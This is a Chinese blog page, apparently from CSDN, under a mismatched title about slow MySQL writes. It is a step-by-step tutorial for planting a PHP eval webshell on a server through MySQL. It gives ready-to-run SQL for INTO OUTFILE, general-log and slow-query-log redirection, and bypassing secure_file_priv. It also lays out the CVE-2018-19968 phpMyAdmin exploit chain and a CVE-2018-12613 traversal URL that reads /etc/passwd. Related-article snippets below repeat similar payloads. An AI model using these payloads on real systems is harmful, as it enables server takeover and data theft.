mysql数据写入突然慢了_通过MySQL写入webshell的几种方式

最新推荐文章于 2022-05-27 10:10:57 发布
最新推荐文章于 2022-05-27 10:10:57 发布
阅读量305 收藏 1
点赞数
文章标签: mysql数据写入突然慢了 windows 编程 edit 写入 引发了异常: 写入访问权限冲突

当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库写入webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库写入webshell的方法,以拿到phpMyAdmin为例。

-01-

通过outfile写入shell

利用条件:

1、root权限2、网站的绝对路径且具有写入权限

执行如下语句写入shell:

select '<?php  @eval($_POST[1]);?>' into outfile 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';

294462d793ae0cedf78ed8f7c960a6be.png

使用蚁剑进行连接:

2783a0d7b6ffd714af684b75a9f010e1.png

在写入的时候可能会出现如下错误:

75509d00ed888c02e459aff2438ecd0b.png

这是由于在高版本的MySQL添加了个叫secure_file_priv的参数,导致我们无法导出文件,在后面会讲解如何绕过secure_file_priv,前一部分假设具有导出权限

-02-

将shell写入表中

利用条件:

1、root权限2、网站的绝对路径且具有写入权限

执行如下语句写入shell:

将shell插入一个表中insert into `sxss`(`comment`) values ('<?php  @eval($_POST[1]);?>');查询该数据表,将结果导出文件select comment from sxss into outfile 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';

e366781c3d57ead3ed8affb57f5ddb71.png

d7d68a6d60de84050f1372e77048c213.png

使用蚁剑进行连接:

3faa3f4d1a9e91895324c6beda75f591.png

-03-

开启全局日志写入shell

利用条件:

1、root权限2、网站的绝对路径且具有写入权限

执行如下语句写入shell:

查看全局日志配置show variables like '%general%';开启全局配置set global general_log = on;将日志文件设置成服务器下的木马文件set global general_log_file = 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';然后执行sql语句,mysql会将我没执行的语句记录到日志文件(上一步修改后的文件)中select '<?php  @eval($_POST[1]);?>';

▼ 查看全局配置▼

b740d90ec71d2cffa21d318936cbb202.png

▼ 开启全局日志 ▼

9fc9c6b1b9a187062c547fe7153a128c.png

▼ 修改日志文件▼

e7687e808d6502933e37122e7ecc265f.png

▼ 执行sql语句写入日志▼

3863aad5c5c4c77a0bd512d15fb51a0d.png

▼ 日志中的内容▼

a2ac5471723490675e0784c83e669887.png

使用蚁剑进行连接:

3faa3f4d1a9e91895324c6beda75f591.png

-04-

慢查询日志写入shell

在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用,其参数值有以下三种:

1、NULL:表示不允许导入导出

2、目录地址,如/tmp/:表示只能对指定目录进行导入导出,如/tmp/

3、空,即没有具体值:表示不对导入导出做限制

可使用如下命令来查看secure_file_priv的值:

show global variables like '%secure%';

cee84afbceb818a5a96e2162cf3d08a5.png

高版本的mysql中默认为NULL,也就是不让导入导出

解决办法

在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=

在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_priv=

使用慢查询日志绕过此限制

利用条件:

1、root权限2、网站的绝对路径且具有写入权限执行如下语句写入shell: 
查看慢查询日志开启情况show variables like '%slow_query_log%';开启慢查询日志set global slow_query_log=1;修改日志文件存储的绝对路径set global slow_query_log_file='E:/phpStudy2018/PHPTutorial/WWW/shell.php';向日志文件中写入shellselect '<?php @eval($_POST[1]);?>' or sleep(11);

▼ 查看慢查询日志开启情况▼

29dab43df597f24f1277cf5373e16e69.png

▼ 开启慢查询日志▼

e883a72aa865eee607dcf82de1f9240d.png

▼ 设置慢查询日志存储文件▼

dbe30e21ab8d3f4c069cee6699c8b9e5.png

▼ 执行查询语句写入日志▼

1f69938df546597172d228cd4352ad3f.png

可以看到日志文件中的内容:

eec0ccafdf462c3be515ec81128ff505.png

使用蚁剑连接:

6782ee3e6b6b10c6b3fb4c2e53531116.png

使用慢查询日志时,只有当查询时间超过系统时间(默认为10秒)时才会记录在日志中,使用如下语句可查看系统时间: 
show global variables like '%long_query_time%';

5a00bb69228c450a195078ec3587382a.png

-05-

CVE-2018-19968文件包含

受影响的phpMyAdmin版本:

4.8.0 ~ 4.8.3

首先登录管理后台

执行如下语句创建数据库,并将shell写入数据表:

CREATE DATABASE foo;CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT "<?php  file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>";

33b59fc2902dec41717c52f9b52a6bb5.png

然后访问http://target/chk_rel.php?fixall_pmadb=1&db=foo

在数据库foo中生成配置表:

f1548439f20d22b4b338910bd848d264.png

来到foo数据库,执行如下语句:

INSERT INTO pma__column_info SELECT '1', 'foo', 'bar', 'baz', 'plop', 'plop', 'plop', 'plop', '../../../../../../../../tmp/sess_***','plop';

将sess_***中的***替换成cookie中phpMyAdmin对应的值(可按f12调出开发者工具,在请求头中拿到):

e9996ec95c3588c8d2d8ef85a21e5daa.png

b817d13f9d6c469c11aa8eb0f6e686db.png

访问:

http://target/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

e0ffffbcbcb4e93a30fe3e887d9f6b8c.png

访问这条连接后将会在网站根目录下生成一个shell.php的webshell,使用蚁剑进行连接:

6c502d8ad0940a8ef495b3a980d54828.png

除此之外,还有:

CVE-2018-12613

http://test.com/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

CVE-2016-5734

CVE-2014-8959

等这里就不一一介绍了

6656b54010b3317f5daa0c7816ed57f0.png
weixin_39648824
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL数据写入webshell
weixin_45253622的博客
03-24 920
MySQL数据写入webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 写入的那个路径存在写入权限 注意点: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
MySQL注入点写入WebShell几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
通过MySQL写入webshell几种方式(小宇特详解)
小宇的web博客
08-07 5380
通过MySQL写入webshell几种方式 -01-通过outfile写入shell 利用条件 1.root权限2.网站的绝对路径且具有写入权限,能够使用into outfile和into dumpfile来进行写入。 这里用了以下的shell union select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/4448.php' 这里连接蚁剑 -02-将shell写入表中 利用条件 1.root权限2.网站
MySQLWebShell总结
Poolhuang的博客
05-27 453
1、写入方式 ①、基于outfile写入 union select 例:?id=1 union select '<?php phpinfo() ?>' into outfile '物理路径' ; ###利用分隔符写入 lines terminated by ::设置每行结尾的字符,可以为单个或多个字符,默认值为‘\n’;可以理解为 以每行终止的位置添加 xx 内容。 例:?id=1 into outfile '物理路径' lines terminated by '<?php .
第01篇:MySQL注入点写WebShell的5种方式1
08-03
本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
MySQL注入是一种常见的安全漏洞,允许攻击者通过构造恶意SQL语句来操纵数据库。在这个话题中,我们将深入探讨三个与文件操作相关的MySQL函数:`INTO OUTFILE`、`INTO DUMPFILE`和`LOAD_FILE()`,它们在SQL注入攻击中...
MySQL导出一句话拿WebShell的方法
06-19
这里的数据实际上是我们希望写入WebShell脚本的内容。 ```sql INSERT INTO temp(cmd) VALUES(''); ``` 注意:这里的`''`只是一个占位符,实际应用时需要替换为真正的WebShell代码。 3. **导出文件**:通过`INTO...
PHP+MySQL脱库
07-02
Webshell是一种恶意代码,黑客通过它可以在服务器上执行命令,控制服务器或者获取数据库信息。下面将详细阐述这个主题的相关知识点。 首先,我们来理解PHP和MySQL的角色。PHP是一种广泛使用的开源脚本语言,常用于...
如何向mysql写入wbeshell
ws1813004226的博客
03-23 889
如何向mysql写入wbeshell 一、成功写入wbeshell必须满足的4个条件: (1)数据库拥有root权限或拥有file权限。 (2)知道网站的绝对路径。 (3)PHP的GPC参数为OFF状态。 (4)MYSQL中的secure_file_priv参数不能为NULL。 二、写入方法 1.使用outfile方法。outfile是mysql提供的一个用来写入文件的函数,当我们可以控制写入文件的内容以及文件的保存路径时,我们就可以上传一个webshell。 2.基于日志写入法。将日志文件的导出目录修改成
mysql数据库插入速度和读取速度的调整
10-24
mysql数据库插入速度和读取速度的调整,希望对你有用!
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3693
Mysql写入webshell
asp写入mysqlshell_MySQL注入点写webshell的五种方式
weixin_39540018的博客
12-20 77
0x00 写数据的前提1,在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。2,未开启全局gpc。(php5.329之后就没有magic_quotes_gpc)0x01 union select 写入最常见的写入方式,union select 后跟 into outf...
mysql 写入_MySQL主从,你遇到过哪些问题?
weixin_39976166的博客
12-18 566
上篇文章介绍了单机环境下的MySQL主从异步复制和主从半同步复制的搭建过程。搭建过程很简单,但是在实际使用过程中,更多的是解决问题,本篇文章将介绍一下MySQL主从复制中常见的问题以及如何定位问题和如何解决问题。1、可能的原因如下(1)主从服务器处于不同的网络之中,由于网络延迟导致;(2)主从服务器的硬件配置不同,从服务器的硬件配置(包括内存,CPU,网卡等)远低于主服务器;(3...
mysql数据写入突然了_探究导致 MySQL 查询的因素:从硬件、网络到数据库的深度剖析...
weixin_39768247的博客
12-05 853
yangyidba| 作者授权转载自「yangyidba」公众号一 前言不管是开发同学还是DBA,想必大家都遇到查询(select,update,insert,delete 语句),影响业务稳定性。这里说的,有两个含义一是比正常的,有可能正常执行时间是10ms,异常的是100ms 。二是sql执行时间超过设置的查询标准比如500ms。本文从IT架构以及数据库纬度来分析导致sq...
Mysql 主从同步相关记录
老King的博客
01-19 268
查看主从同步延时: Seconds_Behind_Master: 0 sync_binlog说明 MySQL提供一个sync_binlog参数来控制数据库的binlog刷到磁盘上去。 默认,sync_binlog=0,表示MySQL不控制binlog的刷新,由文件系统自己控制它的缓存的刷新。这时候的性能是最好的,但是风险也是最大的。因为一旦系统Crash,在binlog_cache中的所...
MySQL 存储写入速度分析
lizhengyu891231的博客
01-09 4027
叙述 问题背景描述:   在MySQL中执行SQL语句,比如insert,贼,明明可能也就只是一行数据的插入,数据量很小,但是耗费的时间却很多,为什么? 解析:   1、读操作:内存读-->cache缓存读-->磁盘物理读     读取到的数据会按上述顺序往回送。   2、写操作:内存数据直接写入cache缓存(非常快)-->写入disk 由上可知,MySQL之所以读写速度快,cache在其中起到了关键作用。 1、Cache缓存特点:   1、速度快   2.
mysql webshell_MySQL注入点写入WebShell几种方式
weixin_35370061的博客
01-18 447
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如当面对一个MySQL注入点,通过使用SQLmap的--os-shell命令选项,便可轻松一键获取Webshell,但是非正常退出时,便会在网站目录中存留SQLmap临时上传的Webshell文件。一个MySQL注入点写入Webshell,...
sql注入写入webshell
最新发布
06-28
攻击者可以使用Webshell来窃取敏感数据、破坏系统、或者在服务器上安装其他恶意软件。 要利用SQL注入写入Webshell,攻击者需要找到一个易受攻击的应用程序,并利用应用程序中存在的漏洞注入恶意的SQL代码。一旦注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值